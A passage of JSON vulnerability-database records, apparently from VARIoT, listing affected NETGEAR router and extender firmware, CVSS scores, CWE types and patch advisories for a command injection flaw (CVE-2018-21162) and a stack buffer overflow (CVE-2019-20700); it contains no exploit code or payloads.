"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects D6400 before 1.0.0.78, EX6200 before 1.0.3.86, EX7000 before 1.0.0.64, R6250 before 1.0.4.8, R6300v2 before 1.0.4.6, R6400 before 1.0.1.12, R6700 before 1.0.1.16, R7000 before 1.0.7.10, R7100LG before 1.0.0.42, R7300DST before 1.0.0.44, R7900 before 1.0.1.12, R8000 before 1.0.3.36, R8300 before 1.0.2.74, R8500 before 1.0.2.74, WNDR3400v3 before 1.0.1.14, and WNR3500Lv2 before 1.2.0.48. plural NETGEAR On the device OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR EX7000 etc. are all products of NETGEAR company. NETGEAR EX7000 is a wireless network signal extender. NETGEAR R8500 is a wireless router. NETGEAR D6400 is a wireless modem. The vulnerability stems from the fact that the network system or product does not correctly filter the special characters, commands, etc. in the process of constructing the executable command of the operating system by external input data. Attackers can use this vulnerability to execute illegal operating system commands",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-21162"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016416"
},
{
"db": "CNVD",
"id": "CNVD-2021-50928"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-21162",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016416",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-50928",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2035",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50928"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016416"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2035"
},
{
"db": "NVD",
"id": "CVE-2018-21162"
}
]
},
"id": "VAR-202004-1649",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50928"
}
],
"trust": 1.103339730625
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50928"
}
]
},
"last_update_date": "2024-11-23T22:11:30.054000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Pre-Authentication Command Injection on Some Gateways, Routers, and Extenders, PSV-2016-0074",
"trust": 0.8,
"url": "https://kb.netgear.com/000059147/Security-Advisory-for-Pre-Authentication-Command-Injection-on-Some-Gateways-Routers-and-Extenders-PSV-2016-0074"
},
{
"title": "Patch for Command injection vulnerabilities in multiple NETGEAR products (CNVD-2021-50928)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/279146"
},
{
"title": "Multiple NETGEAR Product Command Injection Vulnerability Fixes",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=116790"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50928"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016416"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2035"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016416"
},
{
"db": "NVD",
"id": "CVE-2018-21162"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-21162"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000059147/security-advisory-for-pre-authentication-command-injection-on-some-gateways-routers-and-extenders-psv-2016-0074"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-21162"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50928"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016416"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2035"
},
{
"db": "NVD",
"id": "CVE-2018-21162"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-50928"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016416"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2035"
},
{
"db": "NVD",
"id": "CVE-2018-21162"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-50928"
},
{
"date": "2020-06-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-016416"
},
{
"date": "2020-04-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2035"
},
{
"date": "2020-04-23T21:15:11.877000",
"db": "NVD",
"id": "CVE-2018-21162"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-50928"
},
{
"date": "2020-06-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-016416"
},
{
"date": "2020-05-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2035"
},
{
"date": "2024-11-21T04:03:03.257000",
"db": "NVD",
"id": "CVE-2018-21162"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2035"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR On the device OS Command injection vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016416"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2035"
}
],
"trust": 0.6
}
}
var-202004-0909
Vulnerability from variot
Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.44, D6400 before 1.0.0.78, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.110, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R8300 before 1.0.2.122, R8500 before 1.0.2.122, R6900P before 1.3.1.64, R7000P before 1.3.1.64, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7900P before 1.3.0.10, R8000P before 1.3.0.10, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.22, and WNR3500Lv2 before 1.2.0.54. plural NETGEAR The device is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR D8500, etc. are all wireless routers from NETGEAR. The vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in incorrect read and write operations to other associated memory locations. Attackers can use this vulnerability to cause buffer overflow or heap overflow
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-0909",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.1.64"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.1.64"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.42"
},
{
"model": "ex3700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex3800",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex6000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "ex6100",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.24"
},
{
"model": "ex6120",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "ex6130",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "ex6200",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.88"
},
{
"model": "ex7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.26"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.28"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.10"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.10"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.10"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.122"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.122"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.78"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.51"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.54"
},
{
"model": "ex6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "wn2500rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.28"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "dgnd2200b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.78"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.51"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.42"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "dgnd2200b",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "ex3700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex3800",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex6000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.24"
},
{
"model": "dgn2200v4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.28"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "d7000v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.51"
},
{
"model": "ex6150v1",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "wn2500rpv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "wndr3400v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "wnr3500lv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.54"
},
{
"model": "dgnd2200bv4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.110"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61054"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015466"
},
{
"db": "NVD",
"id": "CVE-2019-20700"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgnd2200b_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex3700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex3800_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6100_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015466"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "aircut",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1284"
}
],
"trust": 0.6
},
"cve": "CVE-2019-20700",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2019-20700",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 4.6,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2019-015466",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2021-61054",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.8,
"id": "CVE-2019-20700",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "cve@mitre.org",
"availabilityImpact": "LOW",
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.8,
"id": "CVE-2019-20700",
"impactScore": 4.7,
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.7,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2019-015466",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-20700",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2019-20700",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2019-015466",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2021-61054",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1284",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61054"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015466"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1284"
},
{
"db": "NVD",
"id": "CVE-2019-20700"
},
{
"db": "NVD",
"id": "CVE-2019-20700"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.44, D6400 before 1.0.0.78, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.110, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R8300 before 1.0.2.122, R8500 before 1.0.2.122, R6900P before 1.3.1.64, R7000P before 1.3.1.64, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7900P before 1.3.0.10, R8000P before 1.3.0.10, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.22, and WNR3500Lv2 before 1.2.0.54. plural NETGEAR The device is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR D8500, etc. are all wireless routers from NETGEAR. The vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in incorrect read and write operations to other associated memory locations. Attackers can use this vulnerability to cause buffer overflow or heap overflow",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-20700"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015466"
},
{
"db": "CNVD",
"id": "CNVD-2021-61054"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-20700",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015466",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-61054",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1284",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61054"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015466"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1284"
},
{
"db": "NVD",
"id": "CVE-2019-20700"
}
]
},
"id": "VAR-202004-0909",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61054"
}
],
"trust": 1.1024362164864865
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61054"
}
]
},
"last_update_date": "2024-11-23T22:48:02.006000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Pre-Authentication Stack Overflow on Some Routers, Gateways, and Extenders, PSV-2017-2018",
"trust": 0.8,
"url": "https://kb.netgear.com/000061194/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2018"
},
{
"title": "Patch for Buffer overflow vulnerabilities in multiple NETGEAR products (CNVD-2021-61054)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/285366"
},
{
"title": "Multiple NETGEAR Product Buffer Error Vulnerability Fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=114781"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61054"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015466"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1284"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015466"
},
{
"db": "NVD",
"id": "CVE-2019-20700"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20700"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000061194/security-advisory-for-pre-authentication-stack-overflow-on-some-routers-gateways-and-extenders-psv-2017-2018"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-20700"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61054"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015466"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1284"
},
{
"db": "NVD",
"id": "CVE-2019-20700"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
